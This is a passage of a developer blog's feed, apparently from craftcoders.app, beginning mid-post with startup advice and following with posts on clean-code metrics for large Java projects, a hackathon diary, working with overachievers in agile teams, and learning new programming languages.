  • Is the founder already too much in love with his solution? This is like a pre-programmed deathblow for a startup. Founders and their team should be in love with the problem instead!
  • Can a solution to the problem be sold/presented well and possibly monetized in the long run?

Point 2 – Strategy and Methodology

  • Does the founder want to achieve a good exit, that is, sell the solution at a great value to a big fish?
  • Are there plans to scale the company asap, or put in a HEALTHY growth?
  • Is the Founder (or someone else in the team) a good salesman/ speaker? Because this is one of the most important activities of a founder: selling!
  • How methodically does the startup proceed? It is important that the management team is really literate and enthusiastic about lean startup/ design thinking/ design sprint/ human-centered design! Like this, a startup increases the probability to alleviate the main problem of startups in the best possible way: too little time for much too much to do. Read about my info starter-pack recommendations below.

Point 3 – Figures

To come back to his exact question: of course, there are all kinds of cases.

  • How is the financial plan and current situation?
  • It is quite possible that in the first 3–7 years the business will not be in profit. Still, it can increase in value if it proves to be growing strongly (not necessarily by headcount).
  • In Germany, startups with a hardware product usually have to go into prepayment much more. This comes with lower margin promises and worse scalability, as opposed to digital goods.
  • German investors are not very fond of high investments (in comparison to other countries). That’s (also) why digital products (and especially platforms) are more of a trend. As a team of five you can already solve a huge problem at scale. Not necessarily the first solution has to be scalable, though. A pearl of start-up wisdom says: Do unscalable experiments first. Find out what you need to do without too much pre-investing.

Point 4 – You

  • Is the vision suitable for you? Can you feel being a missionary for what the company wants to stand for? Does it catch you, and you feel the fire burning inside of you?
  • Are you ready to join the company full-time? Maybe you don’t need to invest much more than 40/ 50 hours per week to be successful. Still, usually, the bottom line is that it’s more like two full-time jobs. Especially if you have shares in such a company. Your motivation might be pretty strong to get it profitable.
  • Statistically, your chances are about 10% that you can make a profit with your shares. By the points above you can decide whether it is rather less or rather more than a 10% chance.
  • Determine the possible effect on your CV. E.g. in my friends’ case working in a startup is actually doing good to his vitae. As a postgraduate, he’d prove his interest in the market and the creation of good products, as opposed to being brain-bound (as postgraduates are said to be).
  • So your main investment would be your work performance and the opportunity costs (salary you could otherwise get).

Info Starter-Pack

Here is my personal list for getting informed. Listen to podcasts like Masters of Scale by Reid Hoffman and Wireframe from Gimlet Creative. Check out TEDxTalks, and start with the one that’s really sticking in my head Start With The Why by Simon Sinek. Figuratively eat books like Lean Startup by Eric Ries, Inspired by Marty Cagan, User Story Mapping by Jeff Patton, Sprint by Jake Knapp, John Zeratsky and Braden Kowitz, Actionable Gamification by Yu-Kai Chou, Even Ninja Monkeys Like To Play by Marczewski, Hit Refresh by Satya Nadella and the Autobiography of Goetz Werner. Don’t just read them, but work them through! Make notes, summarize chapters and make notes for your later self (even if you might never read them again). Go on Founding-enthusiasts-meetups, participate at Hackathons (like us), talk about your ideas and concepts and explore the unexplored.

Now, around 1.5 years after I started digging into the topic, I ended up becoming a product owner at a solid startup called sofatutor, and this brought me to a realization: if you wanna make the world a better place, solve real problems of the people and create something special, you don’t necessarily have to be a founder of a startup yourself. Every (small) company can win by having people like you. You can bring all your enthusiasm into place and make it your project!

So what do you think? What would you tell him? What’re your favorite reads about Startups and how to create a product your customers love? Let me know in the comments below, write me a message, link this post in your own blog. I’m very eager to hear other and additive opinions.

Keep up the challenge!

Yours

Sören

]]>
Clean Code: The hard facts and figures https://craftcoders.app/clean-code-the-hard-facts-and-figures/ Mon, 14 Jan 2019 20:53:41 +0000 https://craftcoders.app/?p=891 A couple of weeks ago I began to read Uncle Bob’s old developer bible: Clean Code. I was excited about the presented concepts and put a lot of thought into applying them to code. One day I was lying on the couch of our office, reading Chapter 2: Meaningful Names. Meanwhile, I overheard our team discussing the best troll name for a new database. Another day, I was reading the next chapter, Chapter 3: Functions should be small and do one thing only. Back at my desk, I found myself scrolling through functions with hundreds of lines of code.

Although most teams I know try to produce clean code, it seems to be a hard thing to keep a project clean while it grows. I began to wonder: How much clean code is really out there in the wild? Followed by: How can a project even be considered as clean? So I picked some famous open source projects and analyzed them!

What makes a project clean?

First, let’s summarize what I did: my first intent was to check a static code analysis tool like SonarQube, but I could hardly find an open-source project that also published the results of such tooling. This is when Metrilyzer was born, an analysis tool of mine (private projects again^^) which can read almost every Java-based project and do some data analysis on it. At first, I focused on the following metrics:

  • Classes per package
  • Lines per class
  • Methods per class
  • Lines per method
  • Parameter per method

Of course, these metrics are not enough to consider a project “cleanly coded”, but in my opinion they give a good indication of code modularity and compliance with the single responsibility principle, which is one of the hardest things to accomplish from my point of view. So using these metrics you can at least see clearly when a project is not cleanly coded. 😉 Here are the results.
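If you just want a quick, tool-free sanity check on your own code base, you can approximate the first two metrics with plain shell commands. This only counts physical lines per .java file instead of per class (and src/ is a placeholder for your source folder), so it gives a rough picture at best, but it is good enough to spot outliers:

# Five largest Java files by line count (rough stand-in for "lines per class")
find src/ -name '*.java' -exec wc -l {} \; | sort -n | tail -5

# Number of .java files per package directory (rough stand-in for "classes per package")
find src/ -name '*.java' | xargs -n1 dirname | sort | uniq -c | sort -n | tail -5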

Cassandra, ElasticSearch, Spring Boot – The hard figures

The four tested projects are Cassandra 3.11, ElasticSearch 6.5, Spring Boot 2.1 and Neuronizer Notes (an Android app of mine). In the boxplots you can see the number of lines per class (y-axis) per project (x-axis). N is the number of classes in the project (or rather, the number that could be analyzed by Metrilyzer). The maximum values are somewhat cut off so that the rest of the plot looks better, but you can still read them in the table. If you don’t know how boxplots work, look here: What a Boxplot Can Tell You about a Statistical Data Set

You can see that most of the classes are very small and more than 75% of all classes are smaller than 100 lines of code. Still, every project has a couple of huge classes. It seems like the bigger the project, the longer the longest class is. Not very surprising, but things get more interesting when you compare different metrics. Let’s take a look at lines per method, for example:

Like the classes, most of the methods are very small and more than 75% are shorter than 15 lines. Despite its large number of methods, Spring Boot does a very good job at keeping them small, with a maximum of 54 lines per method. Also interesting is the relation between the values of N in the two metrics (which gives the average number of methods per class):

  • Cassandra: 19393 methods in 4162 classes = 4,65 methods per class
  • Elastic Search: 36027 methods in 8021 classes = 4,49 methods per class
  • Spring Boot: 14140 methods in 5963 classes = 2,37 methods per class
  • Neuronizer Notes: 571 methods in 173 classes = 3,30 methods per class

I have to mention that getter and setter methods are excluded, so in reality the numbers are slightly higher (see the metrics at the end). Neuronizer, which is a small application, has an easy time keeping classes and methods small. As you can see, Cassandra and Elastic Search have a harder time. But Spring Boot is doing very well in comparison to the others; they even have smaller methods than my little Android app. Okay, now let’s take a look at the most problematic classes.

Pinning down problems

What you can see here are the five biggest classes of each project.

Lines per class (top 5 per project):

Cassandra
    org.apache.cassandra.service.StorageService: 4300
    org.apache.cassandra.cql3.validation.operations.SelectTest: 2427
    org.apache.cassandra.service.StorageProxy: 2244
    org.apache.cassandra.db.LegacyLayout: 2160
    org.apache.cassandra.db.ColumnFamilyStore: 2136

Elastic Search
    org.elasticsearch.index.engine.InternalEngineTests: 4653
    org.elasticsearch.index.translog.TranslogTests: 2804
    org.elasticsearch.index.shard.IndexShardTests: 2652
    org.elasticsearch.index.engine.InternalEngine: 2631
    org.elasticsearch.index.shard.IndexShard: 2566

Spring Boot
    org.springframework.boot.context.properties.ConfigurationPropertiesTests: 1509
    org.springframework.boot.test.json.JsonContentAssert: 1277
    org.springframework.boot.SpringApplicationTests: 1269
    org.springframework.boot.SpringApplication: 1267
    org.springframework.boot.test.web.client.TestRestTemplate: 1234

Neuronizer
    de.djuelg.neuronizer.presentation.ui.fragments.TodoListFragment: 458
    de.djuelg.neuronizer.presentation.ui.fragments.PreviewFragment: 285
    de.djuelg.neuronizer.presentation.ui.fragments.ItemFragment: 251
    de.djuelg.neuronizer.storage.TodoListRepositoryImpl: 248
    de.djuelg.neuronizer.storage.TodoListRepositoryImplTest: 214

What I noticed first were the test classes. Since the teams out there (at least those I have been part of) care less about test code quality than about production code quality, it makes sense that test classes can get very long. You can also see that long classes lead to long test classes, Elastic’s InternalEngine and InternalEngineTests for example. As test classes grow, it gets harder and harder to keep them maintainable, so a well thought-out model for test classes should be applied. Regarding large test classes, I can recommend the article Writing Clean Tests – Small Is Beautiful.

Another important thing you can learn from this table is where the application has not been modeled carefully. Cassandra’s StorageService, for example, has a very generic name and became the biggest god class in the project. Elastic’s Engine and InternalEngine had a similar destiny. These classes could easily be separated into a couple of smaller classes, but as they are now they just cannot be clean.

For the interested guys out there, here are the other metrics in an uncommented form. They will be mentioned in the Conclusion though. All visualizations have been done using goodcalculators.com.

Conclusion

Probably, you already thought in the beginning: you can’t put hard figures on the rules of Clean Code, like “Oh boy, this class here is 5 lines too long! Are you dumb?” But you can use these metrics as an orientation. You can aim for the Pareto principle, for example: refactor the highest 20% of each metric and try to stay in the lower 80% with all your new code. When you reach 100 lines of code in a class, for example, there could be better ways to modularize that piece of code. Here are the 80% boundaries for each metric (based on all analyzed projects):

  • 80% of all classes are smaller than 100 lines
  • 80% of all methods are smaller than 12 lines
  • 80% of all packages have fewer than 25 classes
  • 80% of all classes have fewer than 8 methods
  • 80% of all methods have fewer than 3 parameters

Despite this being a rather shallow analysis on the topic of clean code, the results were quite interesting. Using Metrilyzer on a single project with tailored visualizations can be even more helpful to improve modularity and to locate trouble spots. Maybe you want to give it a try to analyze your own projects. If so, I would be glad to hear from you 🙂

Greets, Domi

]]>
The Stuttgart Hackathon Diary https://craftcoders.app/the-stuttgart-hackathon-diary/ Tue, 30 Oct 2018 21:32:52 +0000 https://craftcoders.app/?p=854 Day one at the Stuttgart Hackathon. Our team arrived in three parts:
– The hardcore ones who even took some vacation to get there in time.
– The cool ones who arrived later
– and there is Leon…
In this blog post, I am going to give you an impression of the hackathon.

Day 1

Dear diary, it’s the first day of the hackathon. Dominik, Danny and I chose to work on the cloud of clouds project. Sören is also with us, but he works on another project with some friends. The idea behind cloud of clouds is that you are no longer limited to a single online storage provider. Instead, your data is distributed across all cloud providers, so no single cloud provider owns your data! In two days we cannot develop a complete client with a full CRUD implementation. As a result, we decided to develop a library and a simple CLI that allows uploading a file.

Brainstorming

Night 1

Actually, there’s not much to tell. Because we decided to sleep for a few hours the first night 🙂

Our sleeping place

Day 2

Dear diary,
Dominik, Danny and I decided to do some kind of pair programming. We are just using Danny’s MacBook for coding – no other PC is used! Funny… because everyone is looking at us as the three of us cuddle up in the sleeping corner to program in TDD style. Yep, you understood correctly: we are doing test-driven development at a hackathon! Actually, none of us has done that before, so it’s awesome that we are working together on one PC. You might think “WTF, TDD at a hackathon?!” and you are right… It’s uncommon to write tests at a hackathon, but we think it may be a great experience and we can learn a lot from it! In the end, a hackathon is not about winning, it’s about learning!

Day 2 done – still motivated 🙂

Night 2

We are getting closer and closer to full implementation. Developing in TDD style has changed our interfaces, which we created at the beginning. Those were magic moments! I’ve never developed TDD before, but it’s impressive to see how the test determines the shape of the code.
But we still haven’t connected Dropbox or Google Drive. However, the time is running out! It’s time to unpack our secret weapon, the Crack-Hoe pattern. You’re probably wondering what this is? It’s a design pattern for software that we’ve been using for some hackathons. Using the Crack-Hoe pattern you can achieve maximum encapsulation of ugly code. You put everything into a class called Crack-Hoe. Using a single access point, the magic method, the ugly code can then be executed.

But despite our secret weapon, the crack-hoe pattern, we had to sleep in shifts to get through the implementation.

Day 3

Phew… we made it. Shortly before 9 am we implemented our use case to upload a file, as well as a CLI client. The pitches take place in two rounds. In the first round, you have 5min time to convince the jury. The 20 best ones are allowed to pitch on stage for 3 minutes. But there are several hours between round one and round two. So time to catch up on some sleep!

They are gonna hate me for publishing that photo ?

The 20 best teams are presented… and… and… and… Oh no! We are not among the 20 best 🙁 But hey, you can’t win every hackathon! Also, not having to pitch again has an upside: you can drink a beer with a good conscience. So, we all sat together over a beer and listened to the pitches of the other teams 🙂

Both Teams

BTW Leon never arrived. But we still love him very much 🙂

]]>
5 Steps for Working with an Overachiever in Agile Teams https://craftcoders.app/5-steps-to-handle-overachiever-in-agile-teams/ Mon, 22 Oct 2018 15:27:37 +0000 https://craftcoders.app/?p=817 There is this one developer in your team. She knows the code best. Everyone knows her and everyone asks for her opinion, even on things that are not team- or code-related. She has been in the same agile team as you for quite some time now and she has saved the day more than once. In team discussions, she sometimes won’t let you finish your sentence, but comes up with a better idea anyway. She sometimes even talks on your behalf and you like it, because she does it well, and… it is so convenient to lean back a bit. She has the highest user-story count, and most of the difficult or risky tasks get handled playfully by her. You sometimes wonder how she does it, but well… she is just good at what she does, right? Wrong!

She is a strong personality, an overachiever, a hero, a secret leader – even if not all of the above apply to your teammate, she can still be one. In this blog post, I will try to make you understand why those (hereafter called) overachievers carry a huge risk for an agile team (and company). It is easy to ignore, tolerate or just accept, but if you and everyone else do nothing about a team substance like this, it can react poisonously when combined with the wrong elements. Dare to let it be as it is, and you will suffer the consequences, just like the rest of your team. The way of least resistance is not always a good choice.

But what is so bad about it?

Depending on the overachiever and the team, the following things are possible to happen to some extent:

  • Skill development, success, and outcome should be team achievements. If only one person gets all the credit or is the go-to-person for everything, the rest of the team starts feeling discouraged. Why try harder, when you can only do your job, hide behind her and work off the 9to5-duties? Falling into this behavior, makes your work ultimately seem meaningless. Friendly colleagues, a more or less appropriate salary or a nice environment will not motivate on a long run. If you lose the mission, why stand up in the early Monday mornings at all?
  • You wonder how she does it? She might never let you know. Overachievers tend to take over the tasks, with the mentality of “If you don’t do it yourself, it won’t be done (properly)”. In the same vein, she thinks (or says): “By the time I have explained it to you or someone else, I could have done it myself”. At the latest when you hear one of those two phrases, your alarm should go off! She eagerly maintains her knowledge island and makes it grow. So the team’s success depends on her, sometimes only on her. This puts the team and the organization into a bad place when she feels like she wants “more”, is on vacation, simply not there, or even leaves. In agile teams, this is the worst case in action! Because…
  • It is easy and seems intuitive to mismanage: teams and even companies die in the long run due to encouraging overachievers to save the day over and over again. This is what I saw going down at Goodgame Studios back in the day: they get the feeling that they must be held within the team, or it will fail. Bad or inexperienced managers tend to think they need to give everything to keep them in the company. Suddenly, that overachiever finds herself as a people manager, not able to perform like in her original profession. As a result, the company traded a highly professional developer (or whatsoever) for a “bad” leader. That’s a lose-lose resolution. For a manager, it is easy to overlook the short-sightedness of the success of such an overachiever. Therefore, it is important that everyone understands: a mismanagement of such overachievers is a threat to sustainable success.
  • Overachievers have their specific characteristics. Your team’s approaches and results will lose their exploratory diversity when she is always “in the lead”. Remember: the Product Owner brings the “why”, the Scrum Master the “how” and the team the “what” (see https://www.boost.co.nz/blog/2018/04/successful-scrum-team-product-owner). By having the same approaches and doing the same type of work, you will lose the important ability of scrum teams: solving unknown and complex problems. Work starts to feel highly repetitive and – again – meaningless. The rest of the team starts mirroring her, by also over-/underthinking stories or spending too much/not enough time on general discussions. Moreover, the personal development of each team member will suffer when no one breaks this pattern.
  • Team members feel like they cannot contribute, so they start letting the overachiever do all the talk-work. This ultimately leads to letting her also do all the thought-work (because it’s convenient)… And even though it’s an overachiever in the lead, she might not be aware of the specifics of her “power” and influence. The team ends up getting poorly directed. “People [working for an overachiever often] do not understand where they are going. They’re just following the walk of this turbocharged leader, who doesn’t direct the team but focuses on output. They get annoyed, exhausted, and feel that they need to second-guess what the leader wants because they’re not being told.”, Goleman, D. “Leadership That Gets Results,” Harvard Business Review, March-April 2000.

What to do?

The main objectives are:

  • Let the overachiever share her knowledge (to reduce the knowledge island risk),
  • Give every person equal opportunities to provide their input (to live collaboration and achieve diverse approaches to master complex problems).

Be sure: The overachiever in your team is not a bad person! She aims for only the best for the company and product. Of course, to her, it seems that she does it very well! Remember, you are not enemies or opponents, but teammates who need to figure out how to work best together and achieve sustainable success (and fun)!

Step 1 – Out of your comfort zone!

Well… not (only) the overachiever is the reason why change needs to happen. What does Michael Jackson say again? Start with the man in the mirror! “If you wanna make the world a better place, take a look at yourself and then make a change!”

Speak up, take action and demand change to improve communication and vary methodologies, and don’t fall into the dangerous pit of self-pity and couch-potato convenience. See this paragraph as the start of your journey, for letting your team grow together as a bunch of equals. The team needs someone like you. You will be the one who must demand change if your Scrum Master, Product Owner or Lead doesn’t do it! It means: if not you, no one will. The very fact that you feel or realize that this might be or become an issue in your team means you are the chosen one.

But how, you ask? Expect and demand baby steps! There will not be a “big bang”-change and everything is “good”: One step after another. Even small changes can have a big impact.

Step 2 – The (Scrum Master) Talk

I know, the Scrum Master does not hold any leadership position, and yet she is the one who should facilitate and host team gatherings and meetings. She is supposed to take care that exactly this does not happen. Her influence is limited by the willingness of the team, so give her reason and solid ground to work on equalization within the team. Maybe she is not very experienced yet, or she has also just accepted things the way they are (aware or unaware of what it means). You should seek out a talk with her about what she thinks of the situation, and about what you can do to lift up the team spirit and sustainability! There are many things she can do to give everyone the chance to contribute their ideas, opinions, and qualities.

Ah… and by the way: even if it is only you who feels a bit outside of the system (and everyone else is kind of OK), you should still make your point to her. A Scrum Master should also be the go-to person for a team member’s issues, and help to get all the potential on the street!

Step 3 – Remind and demand Agile Principles

Do I really have to say this? Agile teamwork is about dialogues and collaboration. Embrace every individual in your team as equally important and qualified, as a potential if not experienced (yet). Collaborate, interact, and get the best out of every single member! See the first freaking line of the goddamn Agile Manifesto: “Individuals and interactions over processes and tools” ( http://agilemanifesto.org/ ). Such simple and undiluted wisdom… It makes me cry every time I have to remind people to think about it. It should be burned in your and everyone’s (developer) brain. It is not negotiable or relocatable. This should be surer than day follows night. Before you try to enable the potential of your team with methods or tricks, consider talking about the issue openly with the whole team. Make them understand why embracing and supporting overachiever-ness means to risks sustainable success. A retrospective meeting is a very proper time to place your concerns! Agile teamwork is based on trust. Give your team (including the overachiever) the benefit of trust and honesty.

Step 4 – Bring in opportunities for good behavior

Train your instinct and get a sense for the right moments to embrace collaboration. In discussions and talks, notice who is silent and doesn’t commit to active collaboration. Encourage them to speak (up), i.e. by actively asking them about their opinion. If you know your team members well, another more sneaky way is, to bring up a topic they are passionate about, make a connection and/or take an opposition-position, so you tease them out of their lethargy (you can also (later) be honest about your evil-genuine plan to get them into the conversation). Continuously place suggestions to collaborate or to do pair programming, because sometimes a little push in the right direction is all that’s needed. Yes, also you as a teammate can do this – no need for a Teamlead, Scrum Master or Product Owner to make those moves.

Step 5 – Remove opportunities for bad behavior

There are several methodologies to give everyone the opportunity to provide their own input and to also let them talk without being interrupted, discouraged, or subdued. Usually, your Scrum Master comes up with those ideas, yet sometimes they also need a little inspiration. Don’t worry, it doesn’t always need to be a big thing. Mostly it can already be enough to request a democratic vote, to let everyone think about something themselves and/or add their thoughts. For some bigger topics, though, you might think of the following two approaches.

A neat little allrounder method is silent brainstorming with a presentation round afterwards. Everyone has around 5 to 10 minutes to make up their mind and write it on sticky notes. Afterwards, when everyone is ready and done, each participant gets a limited time to present the sticky notes and do something with them, according to whatever purpose the brainstorming was about. Like this, everything is limited to a specific timeframe and, as you can see, everyone provides input in the same manner. You will find your team in situations where brainstorming can be of value. Instead of just throwing in ideas (and getting overwhelmed by the overachiever), you can suggest silent brainstorming.

Something that helped me a lot to manage bigger teams with a multi-dimensional problem was the following: split the team into two- or three-people groups. Each group targets one part of the topic and presents it to the rest of the team members. If you want more people to provide input on each aspect, do the following: instead of only dividing the team into smaller groups, you also divide the room/location into different subject islands. Each island has one subject host (preferably the overachiever is also a subject host). Every person/group spends around 5 to 15 minutes on each island, while the host notes the important parts of the talks/discussions. After every group has talked about every subject, the hosts present the results of their island. This was most helpful at retrospective meetings or to find solutions for highly complex features or goals.

Always remember: You are not enemies, but teammates!

I hope I could give you a little sense of how you can handle the overachiever in your team. Of course, there is no such thing as a clear path to teamwork-city, but if you take my words as a starting point for orientation, you maybe find the right way. Don’t hesitate to comment or write a direct mail to me, when you have any further questions or feedback.

Enjoy, collaborate and succeed!

Soeren

]]>
3 Lessons about Education https://craftcoders.app/3-lessons-about-education/ Mon, 15 Oct 2018 19:24:04 +0000 https://craftcoders.app/?p=811 I was going to write a plain old blog post with a lot of letters following one another, you know, the usual way, when suddenly ** wild inspiration appeared **. And I thought, why do you guys always have to do all the reading. So I made a video for you. It is 6 minutes long and it took me 3 days to create, so please be kind.

P.S.: Yes, I did misspell “playfulness” in the video. Let’s just all move on and pretend it didn’t happen.

Let’s learn from each other. In a fun way.
Dannynator.

]]>
Explore the Unexplored! (Tech world) https://craftcoders.app/explore-the-unexplored-tech-world/ Mon, 08 Oct 2018 15:58:16 +0000 https://craftcoders.app/?p=774 Autumn is coming. This is the time when I like to grab a cup of hot tea and crawl under a warm blanket with my laptop. As a developer, it’s a good time to broaden your horizons with new knowledge. I want to motivate you to use that time as well to explore the tech world.

Whilst working on tech stuff, a talk with a friend often comes to my mind, in which he asked in a deeply sarcastic tone whether I had time to meet up or whether I was into my “private projects” again. Yeah, exploring the tech world can be pretty time-consuming, but doing so is great fun too. The result of that time was an Android note app which I still use regularly today. With that project, I learned a lot about clean architecture, object orientation, Android, UX, and even project management.

How to approach it

Basically, the message is: engage with a tech field that is new to you. This is not a new idea. Despite that, a lot of professional and experienced developers have a limited mindset when it comes to the usage of appropriate technologies, because they don’t know the objective advantages and disadvantages of choosing one technology over another.

So, the question is not whether you should broaden your horizons or not. It is when and how you should do it and how to keep at it. Here are two approaches which both have their own up- and downsides:

  • Private Projects: You can work on your own small projects about a topic you personally find interesting. As it is something you chose yourself chances are that you are super motivated to start the task. The problem is that you might choose the project scope too big and lose interest before finishing the project. Another problem might be that you don’t have an idea what to code. Therefore I prepared the second point.
  • 7 Languages in 7 Weeks: This is a book written by an inspiring author called Bruce Tate. Within his book, you can find seven introductions to programming languages (what a surprise). They all have different emphasis just like different private projects. If you are a more structured kind of person this might be the choice for you because Mr. Tate guides you through advantages and disadvantages of technologies systematically.

Hacking to the Gate

My current project is part of our future gadget lab, so put your cup of hot tea aside and take a fresh cool Dr.Pepper instead!  We gave our project the name Divergence Meter (modernized) Ver.2.31 and it will help us to finally leave the alpha attractor field and reach the Steins;Gate worldline. I can’t tell you too much as the organization is chasing after us. ~el psy kongroo

For the boring normies out there: A divergence meter is a fictional device from the anime Steins;Gate, but you can use it as a multifunctional clock. A friend of mine built the thing and I’m currently programming it. We created a modernized version using lixies instead of the original nixie tubes because for our poor lab they were more affordable. The lixies work with a rotary encoder called Cronios-1. Put simply, with the rotary encoder you can program your device using a dialect of BASIC namely LED-BASIC. Here is an impression of the beautiful code you can write with it:


' Subroutine 8020: scan data table 50 (entries three values apart) and
' store the index of the first matching entry in EEPROM byte 18.
' VAR: g: Month from data, q: Day from data
8020:
for i = 1 to 10 step 3
g = read 50, i
q = read 50, (i+1)
' An entry matches if its month equals the RTC month and its day is today or later
if g = (IO.getrtc(4)) and q >= (IO.getrtc(3)) and i <> (IO.eeread(18)) then IO.eewrite(18, i)
next i
return

I never programmed that close to the actual hardware and it feels quite hacky in the beginning. You can spend hours trying to display a 6-digit number. The code for our clock has a length of more than 1800 lines in a single file with jump marks all over the place.

Benefits

But I could learn a lot about imperative programming, especially when it comes to separation of concerns. With such a long file and a maximum of 26 variables, which are all global, you have to think about where to put which code snippet to avoid side effects and maintain the structure. Generally speaking, by engaging with projects like this one or the previously mentioned Android app you learn to think about problems in new ways and to use your knowledge from one technology in another. This is also what Mr. Tate states, as you will see in the next section.

7 Languages in 7 Weeks

Let’s assume that you’ve actually managed the difficult task of downloading and installing the interpreter or compiler for the language you are interested in. What should you do next? What will be your first program? – Joe Armstrong, creator of Erlang

This is an excerpt from the book’s preface. If you also have these questions in mind whenever you think about starting a project, then the book will be just right for you. It is stated that new programming models emerge roughly every 20 years. Some emerging new languages are covered, and some well-known languages, too. By doing so you can see how different paradigms overlap or make clean breaks. Concurrency, for example, is a topic which is treated very differently across languages.

Covered languages

Here is a quick overview of the languages and some of the aspects you can learn from them:

  • Ruby: Object orientation, dynamic typing
  • Io: Prototype programming, dynamic typing, concurrent programming
  • Prolog: constraint-logic programming, declarative
  • Scala: Functional programming, Object orientation, addresses critic about Java
  • Erlang: Functional programming, concurrent programming, immutability
  • Clojure: Functional programming, treat code as data, close to Lisp
  • Haskell: Functional programming, strong static typing, lazy evaluation

How to proceed

As soon as you have worked through the book and you are still eager to learn you can search the web for code katas or object calisthenics. These little exercises will help you build more confidence in programming especially if you choose unfamiliar technologies.

As always, thanks for reading! Rumor has it that you can find a PDF version of the book if you search the web. Maybe you should take the chance and start right away 😉

Greets,
Hououin Kyouma

]]>